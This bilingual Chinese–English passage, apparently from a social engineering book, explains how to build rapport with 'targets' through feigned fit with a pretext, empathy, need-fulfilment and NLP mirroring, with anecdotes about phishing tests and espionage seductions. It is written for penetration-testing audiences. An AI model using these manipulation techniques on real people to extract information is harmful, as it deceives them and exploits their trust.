My former coworker, Tony, used to say that building rapport was more important than breathing. I don’t really believe that to be true, but it does have a ring of truth in that rapport building is vital.

 

维基百科将融洽关系定义为“无意识人类互动中最重要的特征之一。它是观点的共性:与你交谈的人‘同步’或‘在同一波长上’。”

Wikipedia defines rapport as, “One of the most important features or characteristics of unconscious human interaction. It is commonality of perspective: being ‘in sync’ with, or being ‘on the same wavelength’ as the person with whom you are talking.”

 

为什么本章要讨论融洽关系?这是与任何人建立关系的关键要素。没有融洽关系,你就会陷入僵局。在社会工程学背后的心理学原理中,融洽关系是支柱之一。

Why is rapport discussed in this chapter? It is a key element in developing a relationship with any person. Without rapport you are at an impasse. Within the psychological principles behind social engineering, rapport is one of the pillars.

 

在了解如何作为一名社会工程师利用融洽关系之前,您必须知道如何建立融洽关系。建立融洽关系是社会工程师武器库中的一个重要工具。

Before getting into the aspects of how to use rapport as a social engineer you must know how to build rapport. Building rapport is an important tool in a social engineer’s arsenal.

 

想象一下,你可以让你遇到的人愿意和你交谈,愿意向你讲述他们的生活故事,愿意向你吐露心声。你有没有遇到过这样的人,你最近才认识的人,但你完全可以放心地告诉他或她非常私密的事情?许多心理原因可能解释了为什么会出现这种情况,但可能是因为你和那个人的关系很好。

Imagine that you could make people you meet want to talk to you, want to tell you their life story, and want to confide in you. Have you ever met someone like that, someone you met recently but feel totally at ease telling him or her very personal things? Many psychological reasons may play into why that may be the case, but the case may be that you and that person just had good rapport.

 

以下部分概述了建立融洽关系以及如何在社会工程中运用融洽关系的重要点。

The following sections outline important points about building rapport and how to use rapport in social engineering.

 

真诚地想要了解别人

Be Genuine about Wanting to Get to Know People

 

人对你来说有多重要?你喜欢结识新朋友吗?这是一种生活心态,不是可以教的东西。建立融洽关系的先决条件是喜欢别人。人们可以看穿虚假的兴趣。

How important are people to you? Do you enjoy meeting new people? It is a mindset about life, not something that can be taught. The prerequisite to building rapport is liking people. People can see through a fake interest.

 

要成为一名优秀的社交工程师并能够利用融洽关系,人们必须对你很重要。你必须喜欢别人并享受与他们互动。你必须想要了解别人。人们可以看穿假笑和假兴趣。对你的目标产生真正的兴趣可以大大有助于建立融洽关系。

To be a good social engineer and to be able to use rapport, people need to be important to you. You must like people and enjoy interacting with them. You have to want to learn about people. People can see through fake smiles and fake interest. Developing a genuine interest in your target can go a long way toward building rapport.

 

注意你的外表

Take Care with Your Appearance

 

有些事情可能会影响你与他人的互动,但你无法改变。不幸的是,在你促成任何互动之前,人们仍然会因为你的肤色、性别或年龄而对你产生敌意。你无法控制这些事情,但你可以控制自己外表的各个方面,比如衣着、体味和清洁度,以及眼神接触、肢体动作和面部表情。我曾经读过一句话,这句话已经被证实了太多次,不容忽视:“如果一个人对自己不满意,别人对他也不会满意。”

You cannot change some things that may affect your interaction with others. Unfortunately, people can still hold your skin color, gender, or age against you before you facilitate any interaction. You can’t control those things, but you can control aspects of your appearance such as clothing, body odor, and cleanliness, as well as your eye contact, body movements, and facial expressions. I read a statement once that I have seen proven true too many times to ignore: “If a person is not comfortable with himself, others will not be comfortable with him either.”

 

注意你的借口和目标。如果你的借口是看门人,那么确保你的举止、着装、态度和言辞反映出那个职位的人。如果你的借口是企业经理,那么确保你的行为和着装得体。这需要研究,但没有什么比看起来不像那个职位更容易破坏融洽关系了。在某些情况下,你的目标是让人们处于自动驾驶模式,这样他们就不会质疑你。如果你的着装、打扮或举止不当,目标就会脱离自动驾驶模式,并降低你成功的机会。

Be aware of your pretext and your target. If your pretext is the janitor, make sure your demeanor, dress, attitude, and words reflect someone in that position. If your pretext is a manager of a business, then make sure you act and dress appropriately. This takes research but nothing kills rapport easier than not looking the part. Your goal in some instances is to keep people in the autopilot mode that will let them not question you. Having your dress, grooming, or demeanor out of place removes the target from autopilot and hurts your chances at success.

 

做一个好的倾听者

Be a Good Listener

 

请参阅前面的部分了解更多详情。良好的倾听能力的重要性怎么强调也不为过。

See the earlier section for more details. The importance of good listening can’t be overstated.

 

无论您是想交朋友还是采取社会工程行动,倾听都是您需要掌握的技能。

Whether you are trying to make a friend or make a social engineering move, listening is a skill you need to master.

 

注意你如何影响别人

Be Aware of How You Affect People

 

有一次,我看到一位老妇人在离开杂货店时掉落了一件物品。我捡起它并跟着她走到停车场。当我追上她时,她已经打开了后备箱,正在往车里装杂货。我走到这位矮小的老妇人身后,身高 6 英尺 3 英寸的我俯视着她,说道:“对不起,女士。”显然我离她太近了,她感到不舒服,当她转过身时,她大叫:“救命!他想抢劫我。救命!”

One time I saw an older woman drop an item as she left a grocery store. I picked it up and followed her out to the parking lot. By the time I caught up with her she had her trunk open and was loading groceries into her car. I came up behind this short, little elderly woman and with all 6’ 3” of me looming over her said, “Excuse me, ma’am.” I was obviously too close for her comfort and when she turned around she screamed out, “Help! He’s trying to mug me. Help!”

 

在与这位女士互动时,我显然需要考虑我的存在会给她带来什么影响。我应该意识到,一位独自待在停车场的老妇人,如果没想到身后会有一个大块头走近她,她可能会惊慌失措。我应该从另一个角度接近她。

I obviously needed to think about how my presence might affect this woman during my interaction with her. I should have realized that an elderly woman all alone in a parking lot who was not expecting a huge man to walk up behind her might freak out. I should have come around and approached her from a different angle.

 

注意你的外表和其他个人方面可能会对与你接触的人产生影响。你需要薄荷糖吗?确保你的脸上或牙齿上没有食物。尽量确保你的个人外表上没有任何令人反感的突出之处。

Be aware of how your appearance and other personal aspects might affect those you will be in contact with. Do you need a breath mint? Make sure no food is on your face or in your teeth. Try to be relatively sure that nothing is glaring in your personal appearance that will turn the person off.

 

加州大学洛杉矶分校心理学教授阿尔伯特·梅赫拉比安因 7-38-55 法则而闻名,该法则指出,统计数据显示,正常交流中只有 7% 是我们说的话,而更多的是肢体语言和声调。试着了解自己,但也要注意与人互动的最初几秒钟。他或她对你的方法的反应可以告诉你是否可能错过了什么,或者你是否需要改变一些东西来提高效率。

UCLA Professor of Psychology Albert Mehrabian is known for the 7-38-55 Rule, which states that statistics show that only 7% of normal communication is the words we say, whereas much more lies in the body language and vocal tones. Try to be aware of yourself, but also pay attention to the first few seconds of interaction with a person. His or her reaction to your approach can tell you whether you possibly missed something, or whether you need to change something to be more effective.

 

作为一名社会工程师,要意识到自己会如何影响他人。如果你脑子里想的都是最终目标,那么你就会对你接触到的人产生负面影响。想想你的外表、言语和肢体语言会如何影响你的目标。你要表现得开朗、热情。

As a social engineer, be aware of how you affect people. If your end goal is all that is on your mind you will affect the people you come into contact with negatively. Think about how your appearance, words, and body language may affect your target. You want to appear open and inviting.

 

不要和自己对话

Keep the Conversation off Yourself

 

我们都喜欢谈论自己,如果我们觉得自己有一个很棒的故事或经历可以分享,我们就会更加喜欢谈论自己——这是人的天性。谈论自己是破坏融洽关系的一种方式。让对方谈论自己,直到他厌倦为止;你会被视为“很棒的朋友”、“完美的丈夫”、“伟大的倾听者”、“完美的销售员”或任何你想要的头衔。当人们可以谈论自己时,他们会感觉很好;我想我们都有点自恋,但通过让对方说话,你会让他更喜欢你。

We all love to talk about ourselves and even more so if we feel we have a great story or account to share—it is human nature. Talking about yourself is one way to kill rapport. Let the other person talk about himself until he gets tired of it; you will be deemed an “amazing friend,” a “perfect husband,” “great listener,” “perfect sales guy,” or whatever other title you are seeking. People feel good when they can talk about themselves; I guess we are all a little narcissistic, but by letting the other person do the talking you will leave that interaction with his liking you a lot more.

 

不要谈论自己。这一点对于社交工程师来说尤其重要。你心中有一个明确的目标,但有时你的判断和方向可能会被“你”想要的东西所蒙蔽。从成功的角度来看,将注意力从目标上移开是危险的。让目标谈论他们的工作、角色和项目,你会惊讶于他们透露了多少信息。

Keep the conversation off yourself. This point is especially cogent for social engineers. You have a definite goal in mind and sometimes your judgment and direction can be clouded by what “you” want. Taking that focus off of the target is dangerous as far as success goes. Let targets talk about their jobs, roles, and projects, and be amazed at how much information they release.

 

记住,同理心是建立融洽关系的关键

Remember That Empathy Is Key to Rapport

 

兰登书屋词典将同理心定义为“对他人的感觉、想法或态度的理智认同或间接体验”。如今,许多人都缺乏同理心,如果你认为自己能解决某人的问题,就很难感受到同理心。然而,真正倾听某人说的话,试着识别和理解潜在的情绪,然后运用反思技巧,可以让对方感觉你真的和他心意相通。

Empathy—defined by Random House Dictionary as “the intellectual identification with or vicarious experiencing of the feelings, thoughts, or attitudes of another”— is lacking in many people today and is especially hard to feel if you think you have the solution to someone’s problem. However, really listening to what someone is saying, trying to identify and understand the underlying emotions, and then using reflection skills can make a person feel as if you are really in tune with him.

 

我认为有必要给出共情的定义,因为了解你必须做什么很重要。请注意,你必须“理智地认同”他人的“感受、想法或态度”,然后体验他们的“感受、想法或态度”。

I felt it necessary to provide the definition of empathy because understanding what it is you have to do is important. Notice that you must “intellectually identify” with and then experience “the feelings, thoughts, or attitudes” of someone else.

 

这些情绪并不总是严肃、令人沮丧或极端的。即使只是理解某人为什么会烦躁、疲倦或心情不佳,也会大有帮助。想象一下,你开车去银行办理业务,银行小姐对你态度很恶劣,因为你忘了签支票,现在她必须把支票寄回去。你还忘了带笔,需要再请她帮个忙。你的反应可能与我的类似,尤其是当她翻白眼并向你投以恼怒的目光时——你想告诉她,她是来为你服务的。相反,试着这样说:“看来你可能有点生气。我理解;当我不得不应付健忘的客户时,我也会生气。我不想问这个问题,但是我能不能拿支笔?”

These aren’t always serious, depressing, or extreme emotions. Even understanding why someone is irritated, tired, or not in the best mood can go a long way. Imagine you go to the bank drive through and the teller lady gives you a monster attitude because you forgot to sign your check and she now has to send it back. You also forgot a pen and need to ask her for yet another favor. Your reaction might be similar to mine, especially if she gave you the eye roll and the irritated glance—you want to tell her that she is here to serve you. Instead, try saying this, “It appears you might be a little irritated. I understand that; I get irritated when I have to deal with my forgetful clients, too. I hate to ask this, but could I please get a pen?”

 

尝试表达同理心时,重要的是不要表现出居高临下的态度。如果你的同理心显得傲慢或自大,你可能会让目标对象觉得你在居高临下地对待他们。

It’s important to not be patronizing when attempting to show empathy. If your empathy seems to come off haughty or arrogant, you can make the target feel like you are patronizing them.

 

你承认她很生气,但没有指责她,表明你也有同样的感受,然后提出请求。同理心对建立融洽关系大有裨益;但要注意的是,融洽关系是不能伪装的。人们需要感受到你真诚的关心,才能建立这种信任关系。如果你不擅长表现出同理心,那就多练习吧。和你的家人、朋友、同事、老师或同学一起练习。无论你如何做,无论在哪里做,练习同理心都会极大地提高你建立关系的技巧。

You acknowledged her being upset but without accusation, showed that you have the same feelings, and then made a request. Empathy can go a long way toward building rapport; one caveat is that rapport cannot be faked. People need to feel you are genuinely concerned to build that trust relationship. If you are not a natural at displaying empathy, then practice. Practice with your family, friends, coworkers, teachers, or classmates. However and wherever you do it, practicing being empathetic will greatly improve your relationship-building skills.

 

同理心是社会工程师的工具。不幸的是,它也经常被用于恶意的社会工程。当世界某个地方发生灾难时,恶意的社会工程师通常会“同情”你。恶意的社会工程师之所以能如此轻易地利用这一工具,可能是因为他们确实来自糟糕、贫穷或贫困的地方。身处困境的人很容易表现出对他人的困境的同情,因此自然而然地就会产生融洽的关系。

Empathy is a tool of the social engineer. Unfortunately, it is also used often in malicious social engineering. When a catastrophe hits somewhere in the world a malicious social engineer is often there to “empathize” with you. The thing that probably makes this tool so easy for malicious social engineers to use in many cases is because they truly are from bad, poor, or impoverished places. Being in bad straits themselves makes appearing empathetic to others’ plights in life easy and therefore creates rapport automatically.

 

当人们觉得你“了解他们”时,没有什么比建立融洽关系更能建立融洽关系了。当一个人是灾难的受害者时,这一点就得到了证实。这是一个可怕的想法,但那些曾经是虐待、犯罪、强奸、自然灾害、战争或其他暴行受害者的人往往能够“理解”那些正在经历这些事情的人的感受。如果建立了这种融洽关系,受害者就会信任错误类型的人。

Nothing builds rapport more when people feel like you “get them.” This is proven very true when someone is a victim of disaster. It’s a scary thought, but those who have been victims of abuse, crime, rape, natural disasters, war, or other atrocities on earth often can “understand” the feelings of those who are experiencing them. This opens victims up to trusting the wrong type of people if that rapport is built.

 

前面提到,纽约发生 9/11 恐怖袭击事件时,许多人声称在恐怖袭击中失去了家人或朋友。这让人们产生了同情,因此这些“受害者”得到了金钱、名誉或他们所追求的一切。

As mentioned before, when the 9/11 attacks happened in New York City, many people claimed to have lost family or friends in terrorist attacks. That made people empathize and therefore these “victims” were given money, fame, or whatever they were seeking.

 

作为一名社会工程审计员,你必须能够拥有各种各样的情感。封闭自己的情感会让你很难产生同理心。这一点与真正喜欢别人有关。如果你这样做,你就不会很难了解他们和他们的故事,也不会很难同情他们。

As a social engineering auditor, you must be able to have a broad range of emotions that you can tap. Being closed in your emotions makes being empathetic very hard. This point goes along with really liking people. If you do, you won’t have a hard time getting to know them and their stories and empathizing with them.

 

全面掌握常识

Be Well Rounded in Your General Knowledge

 

知识就是力量。你不必知道所有事情,但对某些事情有所了解是个好主意。这会让你变得有趣,并给你提供一些谈话的基础。

Knowledge is power. You don’t have to know everything about everything, but having some knowledge about some things is a good idea. It makes you interesting and gives you something to base a conversation on.

 

知识就是力量。作为一名社会工程师,你又会想起那句古老的黑客口头禅。社会工程师应该是一个读者和学习者。如果你的头脑里充满了知识,那么当你接近目标时,你就会有话可说。不要忽视阅读、研究和学习目标的职业或爱好。你的目标不是成为“万事通”并成为每个主题的专家,而是拥有足够的知识,这样当目标问你“你带了 RJ-45 连接器来修复服务器的网络连接问题吗?”时,你不会一脸茫然地看着她。

Knowledge is power. The old hacker mantra comes back to you as a social engineer. A social engineer should be a reader and a studier. If you fill your head with knowledge then you will have something to talk about when you approach a target. Don’t neglect reading, researching, and studying about the topic of the target’s occupation or hobbies. Your goal is not to be a “know-it-all” and become an expert on every topic, but rather to have enough knowledge that you don’t look at the target with a blank stare when she asks, “Did you bring an RJ-45 connector with you to fix the server’s network connection issues?”

 

培养你的好奇心

Develop Your Curious Side

 

当谈到自己对做事方式的信念或想法时,人们通常会感到有点自以为是。这种自以为是或评判的态度会改变一个人对别人所说的话的反应。即使你什么也没说,你也可能开始思考,这可以通过你的肢体语言或面部表情表现出来。不要自以为是,要对别人的想法和做事方式产生好奇心。好奇心可以让你避免做出草率的判断。这可以通过谦虚地寻求帮助或询问更多信息来实现。要心胸开阔,能够了解和接受别人对某个话题的想法,即使这些想法与你的想法不同。

People normally feel a little self-righteous when it comes to their beliefs or thoughts on the way things should be done. That self-righteousness or judgmental attitude can change the way a person reacts to something being said. Even if you don’t say anything you may start to think it, which can show in your body language or facial expressions. Instead of being self-righteous, develop a curiosity about how other people think and do things. Being curious keeps you from making rash judgments. This can be applied by being humble enough to ask for help or ask for more information. Be open minded enough to look into and accept another’s thoughts on a topic, even if those thoughts differ from yours.

 

好奇心并没有害死社会工程师。从非社会工程师的角度来看,这一点并没有太大的变化。当你对别人的生活方式、文化和语言感到好奇时,你就会开始理解是什么让人们产生共鸣。好奇心还能让你在个人判断上不至于僵化和固执。你可能不认同某些话题、信仰或行为,但如果你能保持好奇心和不加评判的态度,那么你就可以通过尝试理解他为什么是、为什么行动或为什么表现成某种样子来接近一个人,而不是评判他。

Curiosity did not kill the social engineer. This point doesn’t change much from a non–social engineer perspective. When you become curious about others’ lifestyles, cultures, and languages you begin to understand what makes people tick. Being curious also keeps you from being rigid and unbending in your personal judgments. You may not personally agree with certain topics, beliefs, or actions but if you can remain curious and nonjudgmental then you can approach a person by trying to understand why he is, acts, or portrays a certain way, instead of judging him.

 

找到满足人们需求的方法

Find Ways to Meet People’s Needs

 

这一点是清单中的重点,也是本书最有力的观点之一。威廉·格拉瑟博士写了一本名为《选择理论》的书,他在书中指出了人类的四个基本心理需求:

This point is the pinnacle of the list and is one of the most powerful points in this book. Dr. William Glasser wrote a book called Choice Theory in which he identified four fundamental psychological needs for humans:

 
 
     
  • 归属/联系/爱
  • Belonging/connecting/love
  •  
     
  • 权力/意义/能力
  • Power/significance/competence
  •  
     
  • 自由/责任
  • Freedom/responsibility
  •  
     
  • 乐趣/学习
  • Fun/learning
  •  
 

这一点背后的原理是,通过与你交谈,创造满足人们这些需求的方法可以立即建立融洽的关系。如果你能创造一个环境来满足人们的这些需求,你就能建立牢不可破的纽带。

The principle behind this point is that creating ways for people to get these needs met by conversing with you builds instant rapport. If you can create an environment to provide those needs for people, you can create bonds that are unbreakable.

 

让我给你讲一个简短的故事,来说明满足人们的需求有多么强大。我出过一次小车祸。一个年轻的司机在我前面停下,然后决定停车。我有一瞬间的时间来决定是要以 55 英里的时速撞上他,还是避开他,然后把车从一条小沟里扔到山边。我立刻决定不撞死车里的三个年轻人。我的车飞了起来,直到被坚硬的岩石挡住。我看着我漂亮的小型定制捷达在重压下变形,我的脸撞在挡风玻璃上。我几乎没有撞到对方司机的后保险杠,但我的速度太快了,他的车在高速公路上侧翻了。当我确定了方向后,我们叫来了警察和救护车。

Let me tell you a brief story about how powerful meeting people’s needs can be. I was in a minor car accident. A young driver pulled out in front of me and then decided to stop. I had a split second to decide between hitting him going 55 mph or veering off away from him then launching my car over a small ditch into the side of a mountain. I chose in a second to not kill the three young people in the car. My car went airborne until it was stopped by solid rock. I watched my beautiful little customized Jetta crumple under the weight, and my face smacked off the windshield. I barely nicked the other driver’s rear bumper but I was moving fast enough that his car was sideways in the highway. When I was able to get my bearings we called the cops and an ambulance.

 

这位年轻人的保险公司和我不​​一样。第二天早上,我接到了他代理人的电话,他礼貌地问了我一些问题。他告诉我,一位理赔员会来查看我那辆已经撞坏的捷达,48 小时内我就收到了一张支票和一封信,信中说他们将承担我康复期间的所有医疗费用。

The young man had a different insurance company than I did. The next morning I got a call from his agent, who politely asked me questions. He told me that an adjuster would come out to see my now-crumpled Jetta, and within 48 hours I was handed a check and a letter stating they would cover all medical costs for my recovery.

 

然后他的保险代理人给我打了个电话,询问我是否还好。你觉得我接到了多少保险公司的电话?我接到了一个,只是告诉我如何回答问题。

I was then given a follow-up call from his insurance agent to see whether I was okay. How many calls from my insurance company do you think I got? I got one, just to tell me how to answer questions.

 

我明白,关心每个人不是这些大公司的工作。但另一位经纪人打电话给我,只是想看看我是否没问题。我没有为获得报酬而争吵,我的车得到了一个非常公平的价格。

I understand that caring about each person is not the job of these large companies. But the other agent called me just see whether I was okay. I fought no battles to get paid and I was given a very fair price for my car.

 

两天后,我取消了保险,去找了 Eric,他是那个年轻人公司的保险代理人,给我打电话的那个人。我告诉他,我对他所推销的东西印象深刻,所以我想要购买。到现在已经 12 年了,我每次需要保险时都会找 Eric。大约两年前,我接到一家保险公司的电话,他们提供的费率比 Eric 和他的公司提供的费率要低得多。我甚至不敢想象要这样对待 Eric。为什么?因为关系融洽——很简单。Eric 是我的朋友、我的帮手、我可以打电话咨询保险问题的人,以及总是能给我最好建议的人。他很关心我,他了解我的家人,而且他从不试图强行推销我。他不需要这样做,因为我会买他卖的任何东西,因为我信任他。

Two days after that I cancelled my insurance and went to see Eric, the insurance agent who called me, from the young man’s company. I told him I was so impressed that I wanted what he was selling. It has been 12 years now and I use Eric for every insurance need I have. About two years ago I got a call from an insurance company offering me rates that were substantially lower than what Eric and his company offer. I couldn’t even think about doing that to Eric. Why? Rapport—plain and simple. Eric is my friend, my helper, someone I can call about questions on insurance, and someone who will always give me the best advice. He cares, he knows my family, and he never tries to hard-sell me. He doesn’t have to, because I will buy whatever he has, because I trust him.

 

这就是融洽的力量。我不知道,也许埃里克关心我的目的是让我转到他的保险公司,尽管我对此表示怀疑。了解他后,我知道他确实关心我,任何认识他的人都这么说。他和他兄弟经营着一家稳固的公司。融洽可以建立超越成本或损失的人际关系。

This is the power of rapport. I don’t know, maybe Eric’s end game in checking on me was to get me to move to his insurance practice, although I doubt it. Knowing him, he actually cares and anyone who knows him says the same thing. His brother and he run a solid business. Rapport can create bonds between people that transcend cost or loss.

 

满足对方的需求可以大大增加建立融洽关系的机会。不要表现出有目的性,要真心实意地提供帮助,结果会让人惊喜。对于社会工程师来说,也许没有比满足这些需求更有价值了。学习如何创造一个让目标感到舒适并满足四个基本需求之一的环境是确保建立牢不可破的融洽关系的可靠方法。

Filling a need for the person you are talking to drastically increases the chances of building rapport. Do it without appearing to have an end game, do it with a genuine desire to help, and be amazed at the results. Perhaps no other avenue is more valuable for social engineers than being able to meet these needs. Learning how to create an environment that allows the target to feel comfortable and get one of the basic four fundamental needs met is a sure way to ensure unbreakable rapport.

 

间谍经常使用这种满足需求或欲望的原则。我最近去南美洲的一个国家旅行时,有人告诉我,该国政府一直在通过满足“联系或爱”的基本需求来渗透。一个美丽的女人会被派去勾引一个男人,但这不是一夜情。她会勾引他几天、几周、几个月甚至几年。随着时间的推移,她会越来越大胆地要求他们亲密的地方,最终进入他的办公室,在那里她可以访问植物虫、特洛伊木马或克隆驱动器。这种方法很具破坏性,但很有效。

Spies use this principle of filling a need or desire often. In a recent trip to a South American country I was told that its government is infiltrated all the time via fulfilling the basic need of “connecting or love.” A beautiful woman will be sent to seduce a man, but this is no one-night stand. She will seduce him for days, weeks, months, or even years. As time continues she will get bolder with her requests for where they are intimate, eventually making their way to his office, where she gains access to plant bugs, Trojans, or clone drives. This method is devastating, but it works.

 

社会工程师也会通过钓鱼邮件满足用户的需求。在一次测试中,一家声誉极高的公司的 125 名员工收到了假图片文件,这些图片文件被标记为 BritneyNaked.jpg、MileyCyrusShowering.jpg 和其他类似名称,每张图片都编码了恶意代码,让社会工程师能够访问用户的计算机。结果显示,超过 75% 的图片被点击。结果发现,图片中提到的明星越年轻,点击率就越高。

Social engineers fill desires through phishing emails also. In one test 125 employees of a very reputable company were sent fake image files labeled BritneyNaked.jpg, MileyCyrusShowering.jpg, and other such names, and each image was encoded with malicious code that would give the social engineer access on the user’s computer. The results were that more than 75 percent of the images were clicked. What was found was the younger the star mentioned in the picture, the higher the click ratio.

 

这些令人作呕和震惊的事实表明,满足人们的欲望是多么有效。当面询问也一样。警察审讯人员一直使用这种策略来建立融洽关系。

These disgusting and devastating facts show how well fulfilling people’s desires can work. In person, too, it is no different. Police interrogators use this tactic for building rapport all the time.

 

有一次,我采访了一位执法人员,为我在 social-engineer.org 上做的播客节目做准备(www.social-engineer.org/framework/Podcast/001_-_Interrogation_and_Interview_Tactics)。这位嘉宾讲了一个故事,证明了融洽关系的力量可以让人们遵从要求。警察逮捕了一名偷窥狂。他有一种癖好,喜欢侵犯穿粉色牛仔靴的女性的隐私。这位执法人员并没有因为他是个怪胎而责备他,而是说了这样的话:“我自己也喜欢红色的”,“前几天我看到这个女孩穿着短裤和高筒牛仔靴,哇!”

One time I interviewed a law enforcement agent for a podcast I did at social-engineer.org (www.social-engineer.org/framework/Podcast/001_-_Interrogation_and_Interview_Tactics). The guest told a story that proves this point about the power of rapport to make people comply with requests. The officers had arrested a man who was a peeping tom. He had a fetish where he loved to invade the privacy of women who wore pink cowboy boots. The agent, instead of judging him for the freak he is, used phrases like, “I like the red ones myself,” and “I saw this girl the other day wearing short shorts and high cowboy boots, wow!”

 

没过多久,他就开始放松下来。为什么?因为他身处一群志同道合的人中间。他觉得自己与人息息相关,成为了人群中的一员。他们的评论让他感到轻松自在,他开始吐露自己的“习惯”。

After just a short time he began to relax. Why? He was among like-minded people. He felt connected, part of the crowd. Their comments put him at ease and he began to spill his guts about his “habits.”

 

上述是如何培养和建立融洽关系的一个很好的例子,但作为一名社会工程师,你如何使用它呢?

The preceding is a nice example of how to develop and build rapport, but how can you use it as a social engineer?

 

通过应用前面讨论的建立融洽关系的原则,您可以在几秒钟内建立融洽关系。为了证明这一点,想象一下您需要取一些现金,但您身上没有 ATM 卡,而且您忘记了您的账号,所以您必须进去向别人寻求帮助。也许您对不得不询问您的账号感到有点尴尬。您走进一家您从未去过的银行当地分行。银行里没有人,您可以选择出纳员。也许您没有考虑过这一点,大多数人都没有,但您会查看所有开放的通道,选择让您感觉最舒服的人。您将从每条通道获得相同的结果,但您会选择让您感觉良好的那条通道。

You can build rapport in a matter of seconds by applying the principles of building rapport discussed earlier. To prove this, imagine you need to grab some cash, you don’t have your ATM card on you, and you forgot your account number, so you have to go in and ask someone for some help. Maybe you feel a little embarrassed about having to ask for your account number. You walk into a local branch of your bank you have never been into. No one is in the bank and you have your choice of tellers. Maybe you don’t think about it, most people don’t, but you will look over all the open lanes and choose the person who makes you feel the most comfortable. You will get the same results from each lane, but you will choose the one that makes you feel okay.

 

也许你会选择最有魅力的人,或者笑容最灿烂的人,或者最先问候你的人——无论你选择谁,无论你如何选择,你都会有意识或无意识地做出选择,但很多时候都与融洽有关。同样的原则在你和你的目标之间也适用。当你走向目标时,她会根据你的外表、举止、面部表情,当然还有她的情绪,对你做出即时的判断。这些因素大部分都是你可以控制的,所以要先发制人,确保成功。

Maybe you choose the most attractive person, or the one with the biggest smile, or the one who greets you first—whomever you choose and however you choose them you make the choice either consciously or unconsciously, but a lot of it has to do with rapport. The same principle will prove true when it comes to you and your target. As you walk up to a target she will make instantaneous snap judgments of you based on your personal appearance, demeanor, facial expressions, and, of course, her mood. Most of these factors you can control, so take pre-emptive action on them to ensure success.

 

适当地建立融洽关系可以创造出像强力胶水一样的纽带,可以承受轻微的不便,甚至是一些误解。

Building rapport properly creates a bond like strong glue that can withstand minor inconvenience and even some misunderstanding.

 

融洽关系使一个人能够说出和做出只有亲密朋友才能做的事情,因为他或她被带入了信任的内心圈子。这是一股强大的力量,没有它,销售人员、友谊、就业和许多其他情况都会变得更加困难。

Rapport allows a person to say and do things that only close friends can do, because he or she is brought into that inner circle of trust. It is a powerful force without which salespeople, friendships, employment, and many other situations are much more difficult.

 

还记得第 4 章关于借口的内容吗?您了解到借口不仅仅是扮演一个角色,它还意味着要活出、成为并成为您向目标展示的那个人。拥有一个强有力的借口对于建立正确的融洽关系至关重要。在许多社会工程活动中,您没有时间构建故事情节并使用长期的诱惑或融洽技巧,因此您的成功将取决于您需要做的许多非语言的事情。

Remember Chapter 4 on pretexting? You learned that pretexting is more than just playing a part, it is living, being, and becoming the person you are portraying to the target. Having a strong pretext is imperative to building the right kind of rapport. In many social engineering engagements you will not have the time to build a storyline and use long-term seduction or rapport techniques, so your success will be based on many of the non-verbal things you will need to do.

 

使用其他建立融洽关系的技巧

Using Other Rapport-Building Techniques

 

还有其他基于 NLP 研究的建立融洽关系的技术。正如您现在所知,建立融洽关系基本上就是与某人建立联系并让他或她感到安心;催眠师和 NLP 从业者使用的一些 NLP 技术可以让人们立即感到安心,如下所述。

Other rapport-building techniques exist that are based in NLP research. As you now know, rapport is basically connecting with someone and putting him or her at ease; some NLP techniques used by hypnotists and NLP practitioners can put people at ease instantly, as discussed next.

 

与目标保持相同的呼吸频率

Breathing at the Same Rate as Your Target

 

与他人以相同的频率呼吸并不意味着你要仔细聆听每一次呼吸,并尝试在目标呼吸时吸气和呼气。但有些人的呼吸模式非常明确:有些人呼吸快而短,有些人呼吸长而深。注意目标如何呼吸并模仿该模式,但不要鹦鹉学舌(即在同一时间进行)。

Breathing at the same rate as someone doesn’t mean you closely listen to every breath and try to breathe in and out when your target does. But some people have very defined breathing patterns: Some have fast and short breathing, and some have long and deep breathing. Notice how the target breathes and mirror that pattern, but without parroting (that is, doing it at the same exact time).

 

匹配目标的声调和说话方式

Matching Your Target’s Vocal Tone and Speech Pattern

 

我出生在纽约,在一个意大利家庭长大。我说话很快,声音很大,而且会用手势说话。除了 75% 的意大利血统外,我还 25% 的匈牙利血统。我身材高大,声音很大,手势就像专业手语翻译一样快。如果我接近一个胆小、害羞、说话缓慢的南方人,如果我不放慢速度、放下手并改变我的沟通方式,我就会破坏这种融洽的关系。倾听目标的语调,并将你的语调与他的语调相匹配,无论他是慢速、快速、大声、安静还是轻声说话。至于口音,一个好的规则是:不要尝试。除非你能做得很好,否则不要尝试。糟糕的口音会破坏融洽的关系。

I was born in New York and raised in an Italian family. I talk fast, loud, and with my hands. In addition to being 75 percent Italian, I am 25 percent Hungarian. I am big, tall, and loud and gesture like a professional sign language translator on speed. If I approach a timid, shy, slow-talking southerner I can kill rapport if I do not slow down, put the hands away, and change my communication style. Listen to your target’s vocal tone and match yours to his, whether he is a slow, fast, loud, quiet, or soft speaker. As for accents, a good rule is: Don’t try. Unless you can do it very well don’t even attempt it. A poorly done accent is a rapport killer.

 

同样,你也可以试着听听关键短语。人们会使用“okie dokie”或“yepper”之类的词语。听听任何关键短语,即使它们不存在,你也可能能够将它们组合成一个句子。

Along these same lines, you can also try to listen for key phrases. People use terms like “okie dokie” or “yepper.” Listen for any key phrases, and even if they are out there, you might be able to work them into a sentence.

 

有一次,我和一个目标人物交谈时,他会说这样的话:“这件事是六分之一,六分之一。”我很少用这句话,也不想把事情搞砸,因为那会造成缺乏融洽的关系。相反,我会混入这句话中的一些关键词,并说这样的话:“我肯定做过六次。”

Once I was talking with a target who would say things like, “It’s six of one and half dozen of another.” I don’t use that phrase a lot and didn’t want to screw it up, because that would create a lack of rapport. Instead, I would mix in some of the key words of that phrase and say things like, “I must have done that a half dozen times.”

 

一个人说话的方式也是你应该限制个人判断的方面。有些人喜欢近距离交谈,有些人喜欢低声细语,有些人喜欢抚摸对方——如果你不是这样,你需要允许一个人自由地以他或她舒服的方式说话,然后模仿他。

How someone talks is also an area where you should restrict your personal judgments. Some people are close talkers, some are whisperers, some are touchers—if you are not, you need to allow a person freedom to talk the way he or she is comfortable and then mirror it.

 

匹配目标的肢体语言

Matching Your Target’s Body Language

 

匹配的肢体语言是建立融洽关系的一种非常有趣的方式,主要是因为它可以建立非常牢固的联系,但同时,如果不匹配,它可能会在几秒钟内毁掉所有的融洽关系。

Matching body language is a very interesting avenue of rapport building mainly because it can work to create very strong bonds but at the same time it can kill all your rapport in a matter of seconds in the case of a mismatch.

 

如果你注意到某人以某种方式站立,例如双臂交叉,不要以为她正在拒绝你——也许她只是很冷淡。你能将一只手臂交叉在身体上模仿她的姿势,或者将双手交叉成尖塔状吗?

